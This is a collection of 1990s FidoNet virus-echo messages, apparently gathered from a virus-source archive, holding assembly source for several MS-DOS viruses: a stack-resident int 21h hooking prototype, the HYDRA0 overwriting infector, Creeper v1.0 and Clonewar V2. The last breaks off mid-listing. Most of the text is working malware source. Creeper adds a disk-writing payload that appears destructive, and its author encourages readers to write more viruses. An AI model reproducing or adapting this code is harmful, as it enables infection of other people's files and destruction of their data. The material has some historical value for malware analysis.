;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43)
;* To : Edwin Cleton
;* Subj : STACKVIR.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± ±
;± V I R U S P R O T O T Y P E ±
;± ±
;± Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd ±
;± Date : 25 Jan 1991 21:05 ±
;± Function : Found DOS stack in put himself in it. Then trace DOS ±
;± function EXEC and type 'Infect File' ±
;± ±
;± ±
;± If you want to have fun with this program just run file STACK.COM ±
;± Don't worry, this is not a virus yet, just try to find him in memory ±
;± with PCTools and/or MAPMEM. If you can -> just erase the source - it is ±
;± useless for you. If you can't -> you don't have to look at it - it is too ±
;± difficult to you to understand it. ±
;± Best regards, Waleri Todorov ±
;± ±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
mov ah,52h ; Get DOS segmenty
int 21h
cmp ax,1234h ; Also check for already here
jne Install ; If not -> install in memory
ReturnControl
int 20h ; This program will give control
; to main file
Install
mov ax,es ; mov DOS segment in AX
mov DosSeg,ax ; Save DOS segment for further usage
mov ds,ax ; DS now point in DOS segment
call SearchDos ; Search DOS entry point
call SearchStack ; Search DOS stack
push cs ; DS=ES=CS
push cs
pop ds
pop es
mov ax,DosSeg ; get DOS segment in AX
mov cl,4 ; AX*=16
shl ax,cl
mov bx,StackOff ; Stack new begin in BX
and bx,0FFF0h ; Mask low 4 bit
add ax,bx ; Compute new real address
mov cl,4 ; AX/=16
shr ax,cl ; Now we get SEGMENT:0000
sub ax,10h ; Segment-=10-> SEG:100h
mov StackOff,ax ; Save new segment for further usage
mov es,ax ; ES point in DOS New area
mov si,100h ; ES:DI -> DOS:free_space_in_stack
mov di,si ; DS:SI Current segment
mov cx,512d ; Virus is only 512 bytes long
rep movsb ; Move virus to new place
; Installing virus in DOS' stack we will avoid a conflict with PCTools,
; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't
; affected, so if you have program, that count DOS' buffers to found
; Beast666, she won't found anything.
; In further release of full virus I will include anti-debugger system,
; so you will not be able to trace virus
mov di,DosOff ; ES:DI point to DOS int21 entry point
mov ax,DosSeg
mov es,ax
mov al,0EAh ; JMP XXXX:YYYY
stosb
mov ax,offset Entry21
stosw ; New 21 handler's offset
mov ax,StackOff
stosw ; New 21 handler's segment
; Now DOS will make far jump to virus. In case that virus won't
; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching,
; and DOSEDIT will operate correctly (with several virus he don't).
inc di
inc di
mov Int21off,di ; Virus will call DOS after jump
jmp ReturnControl ; Return control to file
; At this moment, return control is just terminate program via int 20h.
; In further release of full virus this subroutine will be able to
; return control to any file (COM or EXE).
; These are two scanners subroutine. All they do are scanning DOS segment
; for several well-known bytes. Then they update some iternal variables.
; Be patience, when debug this area!
SearchDos
mov ax,cs:[DosSeg]
mov ds,ax
xor si,si
Search1
lodsw
cmp ax,3A2Eh
je NextDos1
dec si
jmp short Search1
NextDos1
lodsb
cmp al,26h
je LastDos
sub si,2
jmp short Search1
LastDos
inc si
inc si
lodsb
cmp al,77h
je FoundDos
sub si,5
jmp short Search1
FoundDos
inc si
mov cs:[Int21off],si
sub si,7
mov cs:[DosOff],si
ret
SearchStack
xor si,si
Search2
lodsw
cmp ax,0CB8Ch
je NextStack1
dec si
jmp short Search2
NextStack1
lodsw
cmp ax,0D38Eh
je NextStack2
sub si,3
jmp short Search2
NextStack2
lodsb
cmp al,0BCh
je FoundStack
sub si,4
jmp short Search2
FoundStack
mov di,si
lodsw
sub ax,200h
stosw
mov cs:[StackOff],ax
ret
Entry21 ; Here is new int 21 handler
cmp ah,52h ; If GET_LIST_OF_LISTS
jne NextCheck
mov ax,1234h ; then probably I am here
mov bx,cs:[DosSeg] ; so return special bytes in AX
mov es,bx
mov bx,26h
iret ; Terminate AH=52h->return to caller
NextCheck
cmp ax,4B00h ; If EXEC file
jne GoDos
call Infect ; then file will be infected
GoDos
jmp dword ptr cs:[Int21off]
; Otherwise jump to DOS
Infect
push ds ; At this moment just write on screen
push dx
push ax
push cs
pop ds
mov dx,offset Txt
mov ah,9
CallDos
pushf ; Call real DOS
call dword ptr cs:[Int21off]
pop ax
pop dx
pop ds
ret
Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus
DosSeg dw 0 ; DOS segment
StackOff dw 0 ; Offset of stack/New segment
DosOff dw 0 ; Offset of DOS 21 BEFIRE jump
Txt db 'Infect File$' ; Dummy text
;-+- FMail 0.96â
; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/Twx Windows image
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

228
MSDOS/Virus.MSDOS.Unknown.vir33.asm Normal file
View File

@ -0,0 +1,228 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 23 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HYDRA_0.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:44)
;* To : Mark Hapershaw
;* Subj : HYDRA_0.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA0 ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛ Disassembly by: -=>Wasp<=- aka >>Night Crawler<< ÛÛ
;ÛÛ ÛÛ
;ÛÛ Reassemble with TASM 2.0 ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
DATA_1E EQU 80H
DATA_18E EQU 2E0H
DATA_19E EQU 2E3H
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
HYDRA0 PROC FAR
START:
JMP LOC_1 ; (0225)
DB 59H, 44H, 00H, 00H
DATA_4 DB 'HyDra Beta - Not For Release'
DB '. *.CO?'
DB 0
DATA_7 DW 0, 84FCH
DATA_9 DW 0
DATA_10 DB 0
DB 29 DUP (0)
DATA_11 DB 0
DB 13 DUP (0)
COPYRIGHT DB 'Copyright (c)'
DATA_12 DB ' 1991 by C.A.V.E. HYDRA$'
DB 'Watch for the many heads.', 0DH, 0AH
DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 0DH
DB 0AH, 0DH, 0AH, 0DH, 0AH, 'The fir'
DB 'st eight are easy to find and ki'
DB 'll.', 0DH, 0AH, 0DH, 0AH, 'Their'
DB ' replacements will be more sophi'
DB 'sticated.$'
DB '(c) 1991 - C. A. V. E.$'
LOC_1:
PUSH AX
MOV AX,CS
ADD AX,1000H
XOR DI,DI ; Zero register
MOV CX,2E0H
MOV SI,OFFSET DS:[100H]
MOV ES,AX
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
MOV AH,1AH
MOV DX,OFFSET DATA_10
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
MOV AH,4EH ; 'N'
MOV DX,OFFSET DATA_4+22H
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_5 ; Jump if carry Set
LOC_2:
MOV AH,3DH ; '='
MOV AL,2
MOV DX,OFFSET DATA_11
MOV AL,2
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
MOV BX,AX
PUSH ES
POP DS
MOV AX,3F00H
MOV CX,0FFFFH
MOV DX,DATA_18E
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
ADD AX,2E0H
MOV CS:DATA_9,AX
CMP WORD PTR DS:DATA_19E,4459H
JNE LOC_3 ; Jump if not equal
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JC LOC_6 ; Jump if carry Set
JMP SHORT LOC_2 ; (0247)
LOC_3:
XOR CX,CX ; Zero register
MOV DX,CX
MOV AX,4200H
INT 21H ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
JC LOC_4 ; Jump if carry Set
MOV AH,40H ; '@'
XOR DX,DX ; Zero register
MOV CX,CS:DATA_9
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
LOC_4:
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
LOC_5:
MOV AH,1AH
MOV DX,DATA_1E
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
JMP SHORT LOC_7 ; (02F0)
DB 90H
LOC_6:
PUSH DX
XOR AX,AX ; Zero register
MOV AX,0F00H
INT 10H ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
MOV AH,0
INT 10H ; Video display ah=functn 00h
; set display mode in al
MOV AX,200H
MOV DH,6
MOV DL,25H ; '%'
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
XOR DX,DX ; Zero register
MOV DX,OFFSET DATA_12+14H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,200H
MOV DH,0BH
MOV DL,1BH
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
MOV DX,OFFSET DATA_12+1AH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,200H
MOV DH,17H
MOV DL,0
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
MOV DX,OFFSET DATA_12+9EH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,200H
MOV DH,18H
MOV DL,0
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
MOV AX,4C00H
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_7:
XOR DI,DI ; Zero register
MOV SI,OFFSET DATA_16
MOV CX,0D3H
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
POP BX
MOV CS:DATA_7,0
MOV WORD PTR CS:DATA_7+2,ES
POP BX
JMP DWORD PTR CS:DATA_7
DATA_16 DB 1EH
DB 07H,0B9H,0FFH,0FFH,0BEH,0E0H
DB 03H,0BFH, 00H, 01H, 2BH,0CEH
DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H
DB 01H, 00H, 01H, 2EH, 8CH, 1EH
DB 02H, 01H, 8BH,0C3H, 2EH,0FFH
DB 2EH, 00H, 01H
DB ' Coalition of American Viru'
DB 's Engineers -=-=- '
DB ' Dedicated to supporting the'
DB ' anti-virus industry withou'
DB 't recognition or reward. '
DB ' -=-=- '
DB 0CDH, 20H
HYDRA0 ENDP
SEG_A ENDS
END START
;-+- PPoint 1.86
; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;Options: /m = map file with publics
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
;

361
MSDOS/Virus.MSDOS.Unknown.vir34.asm Normal file
View File

@ -0,0 +1,361 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 24 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CREEPER.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 16:45)
;* To : Mike Salvino
;* Subj : CREEPER.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
;
; Demoralized Youth proudly presents: Creeper v1.0, Original Source
;
; Written by: TORMENTOR
;
; Yez, here it is... It's not like 4096 or Pogue, but it's a virus!
; The reason why I release the original source is that I think I
; can't do much more on this virus... I will start from scratch
; and write a larger and more smarter EXE-virus...
; And if I release this source maybe YOU will get some god ideas and
; write your own virus (or rewrite this!)...
; And if you do, Great! Feel free to mix with it as much as you want
; but please don't change this file!
; Well, go on and write virus! The world is to safe!
;
;
; Regards / TORMENTOR
;
code segment byte public
assume cs:code, ds:code, es:code, ss:code
org 100h
codebeg:
mov ax,043FFh ; Remove virus from code!
int 21h
; Let's allocate some mem!
mov ax,ds
sub ax,11h
mov ds,ax
cmp byte ptr ds:[0100h],5Ah
jnz skip
mov ax,ds:[0103h]
sub ax,40h
jb skip
mov ds:[0103h],ax
sub word ptr ds:[0112h],50h
mov es,ds:[0112h]
push cs
pop ds
mov cx,code_end-codebeg
mov di,100h
push di
mov si,di
rep movsb
push es
pop ds
mov ax,351Ch
int 21h
mov word ptr ds:[int1Cret],bx
mov word ptr ds:[int1Cret+2],es
mov al,21h
int 21h
mov word ptr ds:[real21+1],bx
mov word ptr ds:[real21+3],es
mov ah,25h
mov dx,offset int21beg
int 21h
mov al,1Ch
mov dx,offset int1Cnew
int 21h
push cs
push cs
pop es
pop ds
ret
skip: int 20h
int21beg: push ax
sub ax,4B00h
jz infect
pop ax
cmp ax,043FFh ; Check if Harakiri.
jne real21
mov ax,word ptr ds:[retdata]
mov si,ax
mov di,100h
mov cx,code_end-codebeg
rep movsb
mov ax,100h
pop cx
pop cx
push es
push ax
iret
real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec.
retdata: db 00h, 00h
f_time: dw 0000h
f_date: dw 0000h
infect: pop ax
push ax
push bx
push cx
push di
push ds
push dx
push si
mov ah,43h ; Get file attr.
int 21h
mov ax,4301h
and cx,0FEh ; Strip the Read-only-flag
int 21h
mov ax,3D02h ; Open victim.
int 21h
xchg ax,bx
call sub_2
sub_2: mov di,sp ; God what I hate that Eskimo!
mov si,ss:[di]
inc sp
inc sp
push cs
pop ds
mov ax,5700h ; Get file's time and date
int 21h
mov [si-(sub_2-f_time)],cx
mov [si-(sub_2-f_date)],dx ; And save them...
mov ah,3Fh ; Read X byte from begin.
mov cx,code_end-codebeg
add si,code_end-sub_2 ; SI points to EOF
mov dx,si
int 21h
cmp word ptr [si],'MZ' ; Mark Zimbowski?
je close
cmp word ptr [si],'ZM' ; Zimbowski Mark?
je close
mark: cmp word ptr [si+(mark-codebeg+4)],'YD' ; infected?
je close
call put_eof ; move file ptr to EOF
cmp ax,(0FFFFh-(code_end-codebeg)-100h)
ja close
cmp ax,code_end-codebeg+100h
jb close
add ax,100h
mov word ptr ds:[si-(code_end-retdata)],ax
mov ah,40h ; Flytta beg to end.
mov cx,code_end-codebeg
mov dx,si
int 21h
mov ax,4200h ; fptr to filbeg.
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ; Write virus to beg.
mov cx,code_end-codebeg
mov dx,si
sub dx,cx
int 21h
close: mov ax,5701h
mov cx,[si-(code_end-f_time)]
mov dx,[si-(code_end-f_date)]
int 21h
mov ah,3Eh
int 21h ; close file, bx=file handle
pop si
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp real21
put_eof: mov ax,4202h
xor dx,dx
xor cx,cx
int 21h
ret
int1Cnew:
push ax
inc byte ptr cs:[counter]
mov al,30h
cmp byte ptr cs:[counter],al
jz scan
pop ax
slut: jmp dword ptr cs:[int1Cret]
scan:
push bx
push cx
push di
push ds
push dx
push es
push si
push cs
pop ds
cld
xor bx,bx
mov byte ptr cs:[counter],bh
mov cx,0FA0h
mov ax,0b800h
mov es,ax
xor di,di
again: mov al,byte ptr cs:[text+bx]
sub al,80h
repnz scasb
jnz stick
maybe: inc di
inc bx
cmp bx,10d
jz beep
mov al,byte ptr cs:[text+bx]
sub al,80h
scasb
jz maybe
xor bx,bx
jmp again
beep:
xor cx,cx
mov bx,word ptr cs:[int1Cret]
mov es,word ptr cs:[int1Cret+2]
mov ax,251Ch
int 21h
overagain: mov dx,0180h
xor bx,bx
reset: mov ah,00h
inc bx
cmp bl,5h
jz raise
inc cx
int 13h
hoho: mov ax,0380h
inc cx
int 13h
jc reset
jmp hoho
raise: xor cx,cx
xor bx,bx
inc dx
cmp dl,85h
jnz hoho
jmp overagain
stick:
pop si
pop es
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp slut
counter: db 00h
text: db 'T'+80h, 'O'+80h, 'R'+80h, 'M'+80h, 'E'+80h, 'N'+80h
db 'T'+80h, 'O'+80h, 'R'+80h, '!'+80h
; This is what it scans the screen for --^
int1Cret: db 0EAh, 00h, 00h, 00h, 00h
code_end: ; THE END.
code ends
end codebeg
;
; Greetings to: Charlie, HITMAN, Wiper, Torpedo, Tortuer, WiCO, Drive Screwer
; And ALL other virus-writers!
;
;-+- FidoPCB v1.4 [NR]
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/Txx Specify output file type
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

193
MSDOS/Virus.MSDOS.Unknown.vir35.asm Normal file
View File

@ -0,0 +1,193 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 25 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLONWAR2.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Fred Lee, 2:283/718 (06 Nov 94 16:47)
;* To : Bryan Sullivan
;* Subj : CLONWAR2.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
;Clonewar V2.0
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ Assembly Source Listing for Clonewar V2 Companion Virus ³
;³ Copyright (c) 1993 All Rights Reserved. :) ³
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;³ The Clonewar is a direct action companion virus. This version is simply ³
;³ a partial code optimization of the original.... ³
;³ ³
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
CSEG SEGMENT
ASSUME CS:CSEG,DS:NOTHING
ORG 100H
START:
jmp VIR_BEGIN ;lets get moving...
; db "[CloneWar2]" ;i really hate the waste...
WILDCARD DB "*.EXE",0
FILE_EXT DB "COM",0
FILE_FOUND DB 12 DUP(' '), 0
FILE_CREATE DB 12 DUP(' '), 0
SEARCH_ATTRIB DW 17H
NUM_INFECT DW 0
My_Cmd:
CMD_LEN DB 13
FILE_CLONE DB 12 DUP (' '), 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Read all the directory filenames and store as records in buffer.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Vir_begin:
mov sp,offset STACK_HERE ;move stack down
mov bx,sp
add bx,15
mov cl,4
shr bx,cl
mov ah,4ah ;deallocate rest of memory
int 21h
mov di,OFFSET FILE_CLONE ;Point to buffer.
mov si,OFFSET FILE_FOUND
mov cx,12
rep movsb
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
mov cx,SEARCH_ATTRIB
mov ah,4Eh ;find first matching file
int 21h
jc EXIT ;If empty directory, exit
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Store_name:
mov di,OFFSET FILE_FOUND ;Point to buffer.
mov si,158 ;stow the file found in buffer
mov cx,12
rep movsb
mov di,OFFSET FILE_CREATE ;Point to buffer.
mov si,158
mov cx,12
rep movsb
cld
mov di,OFFSET FILE_CREATE
mov al,'.'
mov cx,9
repne scasb ;find the '.'
mov si,OFFSET FILE_EXT
mov cx,3
rep movsb ;replace the .EXE with .COM
;from buffer
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Check_file: ;does the file exist?
mov dx,OFFSET FILE_CREATE
xor cx,cx
mov ax,3d00h ;Open file, read only
int 21h
jnc find_next
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Infect_file: ;create companion routine
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
xor cx,cx
mov ah,3ch ;construct file
int 21h
jc EXIT
;Write virus to companion file
xchg bx,ax
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
mov dx,OFFSET START
mov ah,40h ;write to file function
int 21h ;do it
;Close file
mov ah,3eh ;assumes bx still has file handle
int 21h
;Change attributes
mov dx,OFFSET FILE_CREATE ;of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h
int 21h
jmp prepare_command
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;...findnext...
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
find_next:
mov ah, 4fh ;find next...
int 21h
jmp store_name
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Prepare_command:
cld
mov di,OFFSET FILE_CLONE
mov al,0
mov cx,12
repne scasb ;find the end of string \0
mov al,0Dh ;<CR>
stosb ;replace \0 with a <CR>
mov ax,12 ;store length of the command
sub ax,cx
mov CMD_LEN, al
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Exit:
;Run the original program
mov si, OFFSET MY_CMD
